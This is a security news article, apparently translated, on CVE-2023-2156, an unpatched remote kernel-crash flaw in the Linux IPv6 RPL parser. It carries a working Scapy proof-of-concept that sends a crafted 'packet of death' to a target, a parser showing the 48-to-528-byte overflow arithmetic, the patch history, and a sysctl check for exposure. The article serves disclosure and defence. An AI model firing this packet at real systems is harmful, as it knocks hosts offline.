0-day vulnerability in the Linux IPv6 stack that allows a remote kernel crash

Details have been disclosed of an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel that allows a system to be halted by sending specially crafted IPv6 packets (a "packet of death"). The problem manifests only when the RPL protocol (Routing Protocol for Low-Power and Lossy Networks) is enabled; RPL is disabled by default in distributions and is used mainly on embedded devices operating in wireless networks with high packet loss.

The vulnerability is caused by incorrect handling of external data in the code that parses the RPL protocol, which leads to an assertion failure and the kernel entering a panic state. When data taken from an IPv6 RPL packet header is placed into the sk_buff (socket buffer) structure with the CmprI field set to 15, the SegLeft field set to 1 and CmprE set to 0, the 48-byte address vector expands to 528 bytes, exposing a situation in which the memory allocated for the buffer is insufficient. In that case the skb_push function, which is used to push data into the structure, detects the mismatch between the data size and the buffer and triggers a panic to prevent a write beyond the buffer boundary.

Exploit example:

# We'll use Scapy to craft the packet
from scapy.all import *
import socket
import sys

# Use IPv6 from your LAN interface
DST_ADDR = sys.argv[1]
SRC_ADDR = DST_ADDR

# We use a raw socket to send the packet
sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

# Craft the packet
# Type = 3 makes this an RPL packet
# Addresses contains 3 addresses, but because CmprI is 15,
# each octet of the first two addresses is treated as a compressed address
# Segleft = 1 to trigger the amplification
# lastentry = 0xf0 sets CmprI to 15 and CmprE to 0
p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

# Send this evil packet
sockfd.sendto(bytes(p), (DST_ADDR, 0))
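To make the size arithmetic behind the crash concrete, the following added example (written for this page, not code from the article, ZDI or the kernel) parses the fixed part of an RFC 6554 RPL source routing header and computes how far the compressed address vector grows when expanded; the constructed header bytes carry the same field values as the proof of concept above (hdrlen=6, SegLeft=1, CmprI=15, CmprE=0), and the field names follow RFC 6554 rather than any specific kernel structure.

```python
from dataclasses import dataclass

IPV6_ADDR_LEN = 16     # full IPv6 address, bytes
RPL_SRH_FIXED_LEN = 8  # nh, hdrlen, type, segleft, CmprI|CmprE, Pad|reserved, 2 reserved
RPL_ROUTING_TYPE = 3   # Routing Type value assigned to RPL (RFC 6554)

@dataclass(frozen=True)
class RplSrh:
    hdrlen: int   # Hdr Ext Len in 8-octet units, excluding the first 8 octets
    segleft: int  # Segments Left
    cmpri: int    # CmprI: prefix octets elided from every address except the last
    cmpre: int    # CmprE: prefix octets elided from the last address
    pad: int      # padding octets after the last address

    @classmethod
    def from_bytes(cls, buf: bytes) -> "RplSrh":
        """Parse the fixed 8-byte part of an RPL SRH; reject other routing types."""
        if len(buf) < RPL_SRH_FIXED_LEN or buf[2] != RPL_ROUTING_TYPE:
            raise ValueError("not an RPL source routing header")
        return cls(hdrlen=buf[1], segleft=buf[3], cmpri=buf[4] >> 4,
                   cmpre=buf[4] & 0x0F, pad=buf[5] >> 4)

    def wire_addr_len(self) -> int:
        """Bytes the compressed address vector occupies on the wire."""
        return self.hdrlen * 8

    def segment_count(self) -> int:
        """Number of encoded addresses; ValueError if the address area is malformed."""
        addr_area = self.wire_addr_len() - self.pad - (IPV6_ADDR_LEN - self.cmpre)
        per_addr = IPV6_ADDR_LEN - self.cmpri  # CmprI is a nibble, so at least 1 byte
        if addr_area < 0 or addr_area % per_addr:
            raise ValueError("address area inconsistent with CmprI/CmprE/Pad")
        return addr_area // per_addr + 1

    def expanded_addr_len(self) -> int:
        """Bytes the address vector needs once every address is 16 bytes again."""
        return self.segment_count() * IPV6_ADDR_LEN

    def growth(self) -> int:
        """Extra bytes a receiver needs before it can expand the header in place."""
        return self.expanded_addr_len() - self.wire_addr_len()

def fits_in_place(srh: RplSrh, headroom: int) -> bool:
    """The check an in-place decompressor must make before pushing the expanded header."""
    return srh.growth() <= headroom

# Constructed fixed header with the proof-of-concept field values: hdrlen=6 (three
# 16-byte addresses, 48 bytes), segleft=1, CmprI=15, CmprE=0, Pad=0; nh=59 is filler.
POC_SRH = bytes([59, 6, RPL_ROUTING_TYPE, 1, 0xF0, 0x00, 0x00, 0x00]) + bytes(48)
```

With CmprI=15 every byte of the 32-byte leading area counts as one compressed address, so the header decodes to 33 addresses and the 48-byte vector needs 528 bytes when expanded, 480 bytes more than it arrived with.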

Notably, the kernel developers were informed of the vulnerability in January 2022 and over the following 15 months attempted to fix the problem three times, issuing patches in September 2022, October 2022 and April 2023, but each time the fix proved insufficient and the vulnerability could be reproduced again. In the end the ZDI project, which coordinated the effort to fix the vulnerability, decided to publish full details without waiting for a working fix to land in the kernel.

The vulnerability therefore remains unpatched. In particular, the patch included in kernel 6.4-rc2 is not effective. Users are advised to verify that the RPL protocol is not in use on their systems, which can be done with the command sysctl -a | grep -i rpl_seg_enabled

source: budenet.ru
